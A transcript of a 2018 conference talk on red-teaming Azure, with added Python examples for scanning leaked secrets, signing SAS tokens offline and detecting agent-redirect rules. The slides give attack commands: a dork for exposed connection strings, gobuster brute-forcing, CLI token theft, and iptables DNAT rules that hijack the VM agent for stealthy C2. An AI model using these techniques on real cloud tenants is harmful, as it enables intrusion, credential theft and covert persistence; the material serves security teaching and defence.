
Blue Cloud of Death: Red Teaming Azure

BSides Denver Presentation on May 11 2018

On-demand IT services are being publicized as the “new normal”, but oftentimes these services are misunderstood and hence misconfigured by engineers, which frequently enables red teams to gain, expand, and persist access within Azure environments.

In this talk we will dive into how Azure services are commonly breached (e.g. discovering insecure blob storage), then show how attackers pivot between the data and control planes (e.g. mounting hard disks, swapping keys, etc.) to expand access. Finally, we will demonstrate some unique techniques for persisting access within Azure environments for prolonged periods of time.

Bryce Kunz (@TweekFawkes) is an Information Security Researcher located in Salt Lake City, Utah. Bryce currently leads the offensive security testing of Adobe's Marketing Cloud SaaS infrastructure by researching and developing custom exploits for web applications and other cloud-based technologies. As a security professional, Bryce has spent time at various agencies (e.g. NSA, DoD, DHS, CBP) focusing on vulnerability research, penetration testing, and incident response. Bryce received an MBA with an emphasis in Information Assurance (IA) from the NSA-designated "Center of Excellence" program at Idaho State University (ISU), on a full academic scholarship from the National Science Foundation (NSF). Bryce holds numerous certifications (e.g. OSCP, CISSP) and has spoken at various security conferences (e.g. DerbyCon).

TweekFawkes

May 11, 2018

Transcript

  1. BLUE CLOUD
    OF DEATH
    Red Teaming Azure

  2. AGENDA
    • Who Am I?
    • Azure Overview
    • Initial Access
    • Storage Access
    • Endpoint Access
    • Expanding Access
    • Persisting Access
    Bryce Kunz
    @TweekFawkes

  3. THE PAST
    RED & BLUE...
    Offense: NSA
    Defense: DHS SOC
    Red Team: Adobe Digital Experience (DX)
    Bryce Kunz
    @TweekFawkes

  4. THE PRESENT
    CYBER SECURITY SERVICES
    Stage 2 Security ( CyberSecurity Services ) - Stage2Sec.com
    BSidesSLC ( By & For the People ) - BSidesSLC.org
    Bryce Kunz
    @TweekFawkes

  5. TRAINING
    AWS & AZURE EXPLOITATION: MAKING THE CLOUD RAIN SHELLS!
    CNO.io - Training (Salt Lake City, Utah), July 12th & 13th: SOLD OUT!
    BlackHat USA (Las Vegas, NV), August

  6. Azure Overview

  7. CLOUD
    (Diagram: Azure Cloud)
    My boss assured me, that’s all we needed to know… :P

  8. DESIGN
    (Diagram: Azure Cloud split into Portal, Control and Data planes)
    cloud demystified!

  9. ADMINS
    (Diagram: Admin added in front of the Portal, Control and Data planes)

  10. CONTROL
    (Diagram: Admin, Portal, Control and Data; Control plane highlighted)
    … From our vantage point …
    … mostly just REST APIs …

  11. DATA
    (Diagram: Admin, Portal, Control and Data; Data plane highlighted)
    … here lies user/customer/account data …

  12. SERVICES
    (Diagram: Azure Cloud with Portal, Control and Data planes; services VMs, Storage, Apps and LBs; Admin)
    …too many for any human to care about…

  13. SERVICES
    (Diagram: same as slide 12)

  14. AGENTS
    (Diagram: as slide 12, with an Agent inside the VMs)

  15. DEVS
    (Diagram: as slide 14, with Dev and a CI Pipeline added)

  16. USERS
    (Diagram: as slide 15, with Users added)

  17. Doomsday

  18. DEVOP-OCALYPSE
    Bryce Kunz - @TweekFawkes
    … $50k!?!?!?

  19. DEVOP-OCALYPSE
    Bryce Kunz - @TweekFawkes
    …EC2 instances destroyed…

  20. ACCOUNTS
    Customer Types:
    • Standard
    • Enterprise Agreement
      - Departments
    (Diagram: Azure Account (Center) with an Account Admin; Subscriptions (e.g. IT, e.g. R&D), each with a Service Admin and Co-Admin; each Subscription holds Resource Groups (RG Stage, RG Prod) that contain resources (R R R R))

  21. Initial Access

  22. OSINT
    (Diagram: Azure Cloud with Portal, Control, Data, Storage, Apps, Admin, LBs, CI Pipeline, Users, VMs and Dev; outside it, Hacker, Internet and Collaboration)

  23. GITHUB
    Bryce Kunz - @TweekFawkes
    Google Dork:
    site:github.com web.config "StorageConnectionString" "DefaultEndpointsProtocol"

  24. PASTEBIN
    Bryce Kunz - @TweekFawkes
    Find Azure Secrets
    • Collaboration
      - PasteBin.com

  25. REPOS
    (Diagram: as slide 22, with Repos added outside the cloud)

  26. BITBUCKET
    Bryce Kunz - @TweekFawkes
    Find Azure Secrets
    • Open Source Intel
    • Code Repositories
      - BitBucket, GitLab
      - Gerrit, GitBlit, Git
      - SVN, etc…

  27. CI
    (Diagram: as slide 25)

  28. DEPLOY ACCESS
    Bryce Kunz - @TweekFawkes
    Find Azure Secrets
    • Open Source Intel
    • Code Repositories
    • Deployment Tools
      - Puppet, etc…
      - Jenkins, etc…

  29. ENDPOINT
    (Diagram: as slide 25, labelled ENDPOINT)

  30. HACK & D/L ACCESS
    Bryce Kunz - @TweekFawkes
    Find Azure Secrets
    • Open Source Intel
    • Code Repositories
    • Deployment Tools
    • Configuration Files
      - Classic Hacks
        -- D/L Secrets

  31. MANY ROADS TO PWNAGE
    (Diagram: as slide 25, labelled MANY ROADS TO PWNAGE)

  32. I Heart AWS & Azure!
    Just in case you think AWS or Azure is bad…
    Here is what I really like about it!
    • Assessment Management is Awesome!
    • Scaling of Logging can be Amazing!
    • Read-Only / Auditor Access is Easy to Setup!

  33. Azure Storage

  34. STORAGE
    (Diagram: VMs, Storage, LBs, Users, Web Server, Apps)

  35. STORAGE
    (Diagram: as slide 34, with a Hacker added)

  36. AZURE BLOBS
    Endpoints: https://myaccount.blob.core.windows.net/mycontainer/myblob
    e.g.: https://bcodstoragetest005.blob.core.windows.net/containertest005/test.txt
    Storage Account Name: bcodstoragetest005
    Container Name: containertest005
    Blob Name: test.txt

  37. DNS BRUTE FORCE
    e.g.: https://bcodstoragetest005.blob.core.windows.net/containertest005/test.txt
    Storage Account Name: bcodstoragetest005
    - Only contains lowercase letters and numbers.
    - Name must be between 3 and 24 characters.

  38. GOBUSTER - DNS
    e.g.: https://bcodstoragetest005.blob.core.windows.net/containertest005/test.txt
    gobuster -m dns -u "blob.core.windows.net" -i -t 100 -fw -w /root/blobdns/3_chars.txt

  39. DNS BRUTE FORCE
    - Only contains lowercase letters and numbers.
    - Name must be between 3 and 24 characters.
    Lower Chars & Nums | Count      | Run Time (100 Threads)
    3                  | 46,656     | ~1 min
    4                  | 1,679,616  | ~25 min
    5                  | 60,466,176 | ~15 hours
    6                  | … etc …    | … etc …

  40. GOBUSTER - DIR
    e.g.: https://bcodstoragetest005.blob.core.windows.net/containertest005/test.txt
    gobuster -m dir -u "https://bcodstoragetest005.blob.core.windows.net" -i -t 100 -e -s 200,204 -w quickdir.txt

  41. AZURE BLOB NAMES
    e.g.: https://bcodstoragetest005.blob.core.windows.net/containertest005/test.txt
    Storage Account Name: bcodstoragetest005
    Container Name: containertest005
    Blob Name: test.txt

  42. BRUTE FORCE
    Possible, but having to brute force or guess three separate variables/parameters in the URL kind of sucks.
    e.g.: https://bcodstoragetest005.blob.core.windows.net/containertest005/test.txt
    Storage Account Name: bcodstoragetest005
    Container Name: containertest005
    Blob Name: test.txt

  43. STORAGE
    (Diagram: as slide 35)

  44. NIMBUSLAND
    Check if an IP address is Azure or AWS

  45. LOLRUSLOVE
    Spider Website for Links to Azure Blobs
    • CNAME Lookup on FQDNs
    TODO: INSERT Screen Shot
    TODO: Demo?

  46. Storage Access

  47. STORAGE
    (Diagram: as slide 25, labelled STORAGE)

  48. FIND CERT
    *.publishsettings
    Get-AzurePublishSettingsFile
    • Management Certificates
    A "publish settings file" is an XML file with a .publishsettings file name extension. The file contains an encoded certificate that provides management credentials for your Azure subscriptions.

  49. FIND SECRET
    “web.config” - ASP.NET
    “app.config” - C#.NET
    • SAS URI
    • Connection String
    • Account Name & Key
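
    The connection-string shape that the slide-23 dork hunts for and the SAS URI / account name & key forms listed on slide 49 are exactly what a repo or config scanner should look for before anyone else does. Added example, not part of the talk: a Python scanner that splits blob URLs into account/container/blob (slides 36-42), checks the storage-account naming rule from slide 37, and flags connection strings and SAS URIs found in a config file, truncating keys so the report does not re-leak them. The sample web.config is constructed; the account name is the one used on the slides, the key and SAS signature in it are dummy values.

```python
import re

# Storage account names: 3-24 lowercase letters and digits only (slide 37).
ACCOUNT_NAME_RE = re.compile(r"^[a-z0-9]{3,24}$")

# Blob endpoint layout from slide 36: https://<account>.blob.core.windows.net/<container>/<blob>
BLOB_URL_RE = re.compile(
    r"https?://(?P<account>[a-z0-9]{3,24})\.blob\.core\.windows\.net"
    r"(?:/(?P<container>[^/?\s\"'<>]+))?(?:/(?P<blob>[^?\s\"'<>]+))?"
)

# Connection-string shape the slide-23 dork hunts for in web.config / app.config.
CONN_STR_RE = re.compile(
    r"DefaultEndpointsProtocol=(?P<proto>https?);"
    r"AccountName=(?P<account>[a-z0-9]{3,24});"
    r"AccountKey=(?P<key>[A-Za-z0-9+/]{20,}={0,2})"
)


def valid_account_name(name):
    """True if `name` satisfies the storage-account naming rules on slide 37."""
    return bool(ACCOUNT_NAME_RE.match(name))


def parse_blob_url(url):
    """Split a blob URL into the three parts of slide 42 (account, container, blob);
    parts that are absent come back as None."""
    m = BLOB_URL_RE.search(url)
    if not m:
        return None
    return {"account": m.group("account"), "container": m.group("container"),
            "blob": m.group("blob")}


def scan_text(text):
    """Report Azure storage references found in a config file or repo blob.
    Account keys are truncated so the report itself does not re-leak the secret."""
    findings = []
    for m in CONN_STR_RE.finditer(text):
        findings.append({"type": "connection-string", "account": m.group("account"),
                         "key_prefix": m.group("key")[:6] + "...",
                         "insecure_transport": m.group("proto") == "http"})
    for m in BLOB_URL_RE.finditer(text):
        # A query string carrying sig= makes the URL a SAS URI (slide 49): a bearer
        # credential for the container, not merely a reference to a public file.
        query = re.match(r"\?[^\s\"'<>]*", text[m.end():])
        is_sas = bool(query) and "sig=" in query.group(0)
        findings.append({"type": "sas-uri" if is_sas else "blob-url",
                         **parse_blob_url(m.group(0))})
    return findings


# Constructed sample web.config: the account name is the one used on the slides,
# the AccountKey and SAS signature are dummy values.
SAMPLE_WEB_CONFIG = """<configuration>
  <appSettings>
    <add key="StorageConnectionString"
         value="DefaultEndpointsProtocol=https;AccountName=bcodstoragetest005;AccountKey=AbCdEfGhIjKlMnOpQrStUvWxYz0123456789abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGH==;EndpointSuffix=core.windows.net" />
    <add key="ReportUrl" value="https://bcodstoragetest005.blob.core.windows.net/containertest005/test.txt" />
    <add key="UploadSas" value="https://bcodstoragetest005.blob.core.windows.net/uploads?sv=2017-07-29&amp;ss=b&amp;srt=sco&amp;sp=rwdlac&amp;se=2019-01-01T00:00:00Z&amp;sig=FAKESIG%3D" />
  </appSettings>
</configuration>"""
```

Run `scan_text` over every file in a repo checkout or deployment bundle; a "connection-string" or "sas-uri" finding is a credential, not just a link, and belongs in the rotation queue.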

  50. STORAGE EXPLORER
    “Install Azure Storage Explorer”

  51. STORAGE EXPLORER
    • SAS URI
    • Connection String
    • Account Name & Key

  52. STORAGE EXPLORER
    • Download Files!
    • Modify Files!

  53. VHDS
    *disks*
    • vhds!

  54. VHDS
    Download vhds
    • Code Review
    • Secrets on Disk
    • Linux - grep for “shadow” hashes

  55. VHDS
    (same as slide 54)

  56. MANAGED DISKS
    2017 Azure Feature
    • By default, no VHDs in blob storage containers!

  57. Storage Persistence

  58. STORAGE
    (Diagram: as slide 47)

  59. STORAGE EXPLORER
    Create SAS!
    • Another way to access the resource

  60. DEMO: SAS Offline Minting!

  61. SAS TOKEN OFFLINE
    MintyOffline
    Append the Following:
    - Storage Account Name
    - Permissions, Protocol
    - Service, Resource Type
    - Start Time, Expire Time
    - & API Version
    HMAC the appended string to create the token, using:
    - Key -> Storage Key
    - Msg -> Appended String
    - SHA256
    Formatting of the Data (e.g. Encode)
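
    Added example, not the MintyOffline tool from the talk: the account-SAS signing that slide 61 describes, in Python, using the documented string-to-sign field order (account, permissions, services, resource types, start, expiry, IP range, protocol, API version; the pre-2020 layout without an encryption-scope line), plus a verifier that shows why the slide-107 advice to rotate secrets is the only thing that kills a token minted offline. The storage keys are constructed dummy values and the account name is the one from the slides.

```python
import base64
import hashlib
import hmac
from urllib.parse import parse_qs, urlencode

# Query-parameter names, in the documented string-to-sign order: permissions,
# services, resource types, start, expiry, IP range, protocol, API version.
SAS_FIELDS = ("sp", "ss", "srt", "st", "se", "sip", "spr", "sv")


def account_sas_string_to_sign(account, params):
    """Storage account name followed by each field (empty if unset), newline-joined,
    with a trailing newline; this is the 'appended string' of slide 61."""
    return "\n".join([account] + [params.get(k, "") for k in SAS_FIELDS]) + "\n"


def sign(storage_key_b64, string_to_sign):
    """HMAC-SHA256 keyed with the base64-decoded storage key; the digest is
    base64-encoded back (slide 61: 'Formatting of the Data (e.g. Encode)')."""
    key = base64.b64decode(storage_key_b64)
    mac = hmac.new(key, string_to_sign.encode("utf-8"), hashlib.sha256).digest()
    return base64.b64encode(mac).decode("ascii")


def mint_account_sas(account, storage_key_b64, **fields):
    """Build an account-SAS query string entirely offline: no control-plane call
    is made, so nothing about the token's creation appears in activity logs."""
    params = {k: v for k, v in fields.items() if v}
    params["sig"] = sign(storage_key_b64, account_sas_string_to_sign(account, params))
    return urlencode(params)


def sas_signed_by(account, storage_key_b64, query_string):
    """Defender-side check: does this token validate under the given key?
    A token minted with a key that has since been rotated fails this test."""
    params = {k: v[0] for k, v in parse_qs(query_string).items()}
    presented = params.pop("sig", None)
    expected = sign(storage_key_b64, account_sas_string_to_sign(account, params))
    return presented is not None and hmac.compare_digest(presented, expected)


# Constructed keys, not real Azure secrets (a real key is 64 random bytes, base64).
OLD_KEY = base64.b64encode(b"old-key-" * 8).decode("ascii")
NEW_KEY = base64.b64encode(b"new-key-" * 8).decode("ascii")


def rotation_demo(account="bcodstoragetest005"):
    """Mint a ten-year token under OLD_KEY, then rotate to NEW_KEY: the token is
    still well-formed and unexpired, yet no longer validates."""
    token = mint_account_sas(account, OLD_KEY, sv="2017-07-29", ss="b", srt="sco",
                             sp="rwdlac", st="2018-05-11T00:00:00Z",
                             se="2028-05-11T00:00:00Z", spr="https")
    return {"token": token,
            "valid_before_rotation": sas_signed_by(account, OLD_KEY, token),
            "valid_after_rotation": sas_signed_by(account, NEW_KEY, token)}
```

Because nothing about an offline-minted SAS is stored server-side, there is no list to audit or entry to revoke; key rotation is the revocation.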

  62. CLI Endpoint Access

  63. ENDPOINT
    (Diagram: as slide 29)

  64. SETUP CLI
    “Install Azure CLI 2.0 on Windows”

  65. CLI AUTH.
    “az login”
    (After logging in, your login token is valid until it goes for 14 days without being used.)

  66. BROWSER COOKIE
    “az login”

  67. STEAL COOKIE!
    “az login”

  68. CLI AUTH.
    “az login”

  69. AUTH. TOKEN
    “.azure” folder
    “azureProfile.json”

  70. STEAL TOKEN
    “.azure” folder
    “accessTokens.json”

  71. WHOAMI
    “az account show”

  72. Expand Access

  73. DATA -> CONTROL
    (Diagram: Azure Cloud with Portal, Control, Data, Storage, Apps, Admin, LBs, CI Pipeline, Users, VMs and Dev; Hacker moving from the Data plane to the Control plane)

  74. AZURE META
    Metadata Service: 169.254.169.254
    curl http://169.254.169.254/metadata/v1/maintenance
    curl http://169.254.169.254/metadata/v1/InstanceInfo
    (These are mostly useless for hackers…) but useful information is copied into the /var/lib/waagent directory when the instance is created (root access needed):
    • IP address, hostname, subscription ID, resource group name, etc…

  75. CONTROL -> DATA
    (Diagram: as slide 73; Hacker moving from the Control plane to the Data plane)

  76. CAPTURE IMAGE

  77. HARD BOOT
    Google: “Reset local Windows password for Azure VM offline”
    Horrible OPSEC but it works…
    - Power off a server
    - Mount the server’s hard drive using another VM
    - Modify the server for remote access (e.g. add an SSH key to root user)
    - Power back on the server & PROFIT!

  78. RESET
    Windows
    • RDP Password Reset
    Linux
    • SSH Key Reset
    • Create User

  79. SCRIPTS
    Linux
    • VM Extension - CustomScript

  80. Persistence

  81. CONTROL
    (Diagram: as slide 25, labelled CONTROL)

  82. SERVICE PRINCIPALS
    (the recommended approach)
    Permissions-Restricted Accounts
    “az login --service-principal” …
    …not tied to any particular user…
    …have permissions on them assigned through pre-defined roles.
    Multiple Passwords!

  83. AGENTS
    (Diagram: as slide 14)

  84. DOCUMENTATION?
    Where we're going, we don't need docs!

  85. START DIGGING
    • ps auxfww
    • file
    • python source code review
    Listening Services
    • netstat -nltpu
    Active Connections
    • netstat -natpu

  86. PYTHON DEBUGGER
    • pdb
    • b: set a breakpoint
    • c: continue debugging until you hit a breakpoint
    • s: step through the code
    • n: go to the next line of code
    • l: list source code for the current file (default: 11 lines including the line being executed)
    • u: navigate up a stack frame
    • d: navigate down a stack frame
    • p: print the value of an expression in the current context

  87. SYSDIG
    sysdig -w 005.scap
    systemctl start walinuxagent.service
    /usr/bin/python3 -u /usr/sbin/waagent -daemon
    sysdig -r 005.scap …
    • -c topfiles_bytes
    • -c topprocs_net
    • -c echo_fds
    • -c fdbytes_by fd.directory "fd.type=file"
    • -c fdbytes_by fd.filename "fd.directory=/var/lib/waagent"

  88. TCPDUMP
    ip.addr == 168.63.129.16

  89. AGENTS
    (Diagram: as slide 14; the Agent inside the VMs talks to Control at http://168.63.129.16)

  90. TASKS
    Periodically polls the HTTP API for taskings
    • http://168.63.129.16
    • (local Azure fabric address)
    • Signals agent for additional tasks
    (Diagram: Agent -> Control at http://168.63.129.16: GET /machine/?comp=goalstate)

  91. HOST CONFIGS
    Pulls hostingEnvironmentConfig
    (Diagram: Agent -> Control at http://168.63.129.16: GET /machine/ … type=hostingEnvironmentConfig; the response references rd_fabric_stable_dhf5.150807-2320.RuntimePackage_1.0.0.14.zip)

  92. CERTS
    Pulls certificates
    (Diagram: Agent -> Control at http://168.63.129.16: GET /machine/ … comp=certificates; the response carries a pfx)

  93. EXTENSION CONFIGS
    Pulls Extension Configuration
    • In this case, the command to run
    (Diagram: Agent -> Control at http://168.63.129.16: GET /machine/ … type=extensionsConfig; the response carries the command to run)

  94. the Journey!

  95. CREDS IN REPO
    (Diagram: Hacker on the Internet, Repos, CI Pipeline, Dev, Users, VMs, Storage, Data, Control, Portal, Admin; step labelled CREDS IN REPO)

  96. VHDS -> CERTS
    (Diagram: as slide 95; step labelled VHDS -> CERTS)

  97. SUBSCRIPTION
    (Diagram: as slide 95; step labelled SUBSCRIPTION)

  98. CUSTOM SCRIPT
    (Diagram: Hacker, Control, Storage, Data, Users, VMs; step labelled CUSTOM SCRIPT)

  99. PERSIST?
    Without getting caught?
    Bypass
    • File Integrity Monitoring
      • So we can’t modify files
    • osquery - process list
      • So we can’t be seen in ps
    • osquery - netstat
      • So we can’t be seen in netstat
    … ?

  100. AGENT
    (Diagram: Agent on VM 10.0.4.4 talking to Control at http://168.63.129.16; Hacker, Storage, Users)
    Already Running
    Pulling for Updates…

  101. BEACHHEAD
    (Diagram: Hacker, Storage, Users; Malware on a Beachhead VM at 10.0.4.5 next to the VM at 10.0.4.4 whose Agent talks to Control at http://168.63.129.16)
    Ideally…
    • Not of high value
    • Not monitored closely
    Install our Malware
    • To ensure access

  102. REDIRECT
    (Diagram: VM 10.0.4.4 with Agent; Beachhead 10.0.4.5 with Malware; Control at http://168.63.129.16; Hacker, Storage, Users)
    Redirect Agent
    • via iptables
    iptables -t nat -I OUTPUT -p tcp --dport 80 -d 168.63.129.16 -m comment --comment "totes not evil" -j DNAT --to-destination 10.0.4.5:80
    Netstat Looks Normal!
    No New Procs!

  103. MITM
    (Diagram: as slide 102, with MITM on the Beachhead 10.0.4.5)
    Pass API Requests
    • via mitmproxy
    iptables -t nat -I OUTPUT -p tcp --dport 80 -d 10.0.4.5 -m comment --comment "totes not evil" -j DNAT --to-destination 168.63.129.16:80

  104. EXEC
    (Diagram: Control at http://168.63.129.16; Beachhead 10.0.4.5 running Malware and MITM; Agent on VM 10.0.4.4; Hacker, Storage, Users)
    Tasks created within the Azure Subscription for the Beachhead with the MITM software on it get redirected and executed on the remote target through the pulling process of the Azure endpoint agent.

  105. DEMO: C2 via waagent Redirection

  106. GOING THE DISTANCE!
    • Only match the redirect during certain times of the day
      • man iptables-extensions -> time
      • … -m time --timestart 01:00 --timestop 02:00 --days Mon,Tue,Wed,Thu,Fri …
    • Match the redirect periodically
      • the agent pulls via GETs every 3 seconds
      • … -m limit --limit … --limit-burst …
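
    The redirect rules on slides 102-103 and the time/limit matches on slide 106 all live in the nat table, where a host check can still see them even though ps and netstat look normal. Added example, not from the talk: a Python detector run over a constructed sample of `iptables -t nat -S OUTPUT` output that flags any DNAT/REDIRECT rule whose destination or target is the wire server 168.63.129.16, and notes when the rule is conditional on -m time or -m limit. The sample uses the slide's addresses and comment string; the time match is written with the current xt_time option names.

```python
import shlex

WIRESERVER = "168.63.129.16"  # the agent's control endpoint (slides 89-93)

# Constructed sample of `iptables -t nat -S OUTPUT` on a compromised VM: line 2 is
# the slide-102 redirect with the slide-106 time match added, line 4 is the
# beachhead-side rule from slide 103, the other rules are benign.
SAMPLE_NAT_OUTPUT = """\
-P OUTPUT ACCEPT
-A OUTPUT -d 168.63.129.16/32 -p tcp -m tcp --dport 80 -m time --timestart 01:00:00 --timestop 02:00:00 --weekdays Mon,Tue,Wed,Thu,Fri -m comment --comment "totes not evil" -j DNAT --to-destination 10.0.4.5:80
-A OUTPUT -d 10.0.0.0/8 -p tcp -m tcp --dport 8080 -j DNAT --to-destination 10.0.0.10:80
-A OUTPUT -d 10.0.4.5/32 -p tcp -m tcp --dport 80 -m comment --comment "totes not evil" -j DNAT --to-destination 168.63.129.16:80
-A OUTPUT -o docker0 -j DOCKER
"""


def parse_rule(line):
    """Reduce one `iptables -S` line to the fields the check needs; None for
    policy lines and anything that is not an -A rule."""
    toks = shlex.split(line)  # keeps the quoted --comment value as one token
    if len(toks) < 2 or toks[0] != "-A":
        return None
    rule = {"chain": toks[1], "dst": "", "target": "", "to": "", "matches": [], "comment": ""}
    for i in range(len(toks) - 1):
        t, nxt = toks[i], toks[i + 1]
        if t == "-d":
            rule["dst"] = nxt.split("/")[0]
        elif t == "-j":
            rule["target"] = nxt
        elif t == "--to-destination":
            rule["to"] = nxt
        elif t == "-m":
            rule["matches"].append(nxt)
        elif t == "--comment":
            rule["comment"] = nxt
    return rule


def find_wireserver_redirects(nat_output):
    """Flag DNAT/REDIRECT rules that send wire-server traffic elsewhere (the target
    VM side) or forward something else on to the wire server (the beachhead side).
    Nothing legitimate on an Azure VM NATs 168.63.129.16, so any hit deserves a look."""
    findings = []
    for line in nat_output.splitlines():
        rule = parse_rule(line)
        if not rule or rule["target"] not in ("DNAT", "REDIRECT"):
            continue
        if rule["dst"] != WIRESERVER and not rule["to"].startswith(WIRESERVER):
            continue
        reasons = [f"{rule['target']} {rule['dst']} -> {rule['to']} involves the wire server"]
        # Slide-106 evasion: the redirect only fires at certain hours or for a
        # fraction of the agent's polls, so a one-off capture may miss it.
        reasons += [f"conditional on -m {m}" for m in rule["matches"] if m in ("time", "limit")]
        if rule["comment"]:
            reasons.append(f"comment {rule['comment']!r}")
        findings.append({"chain": rule["chain"], "dst": rule["dst"], "to": rule["to"],
                         "reasons": reasons})
    return findings
```

Run it against the live output of `iptables -t nat -S` (and `iptables-save`) on a schedule, because a rule gated on -m time is invisible to a capture taken outside its window.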

  107. MITIGATIONS
    • Single Purpose Secrets
    • Limit the Access of each Secret
    • Create roles and limit the access of each role
    • You can ACL off secrets to only work from certain IP addresses
    • Log API calls (e.g. CloudTrail)
    • Never use root secrets (use them as a break-glass account only)
    • Rotate Secrets Frequently
    • Encrypt secrets within Git and other data stores

  108. THANKS!
    Stage 2 Security ( Red Teaming AWS & Azure Env. ) - Stage2Sec.com
    Bryce Kunz
    @TweekFawkes
    CNO.io - Training (Salt Lake City, Utah), July 12th & 13th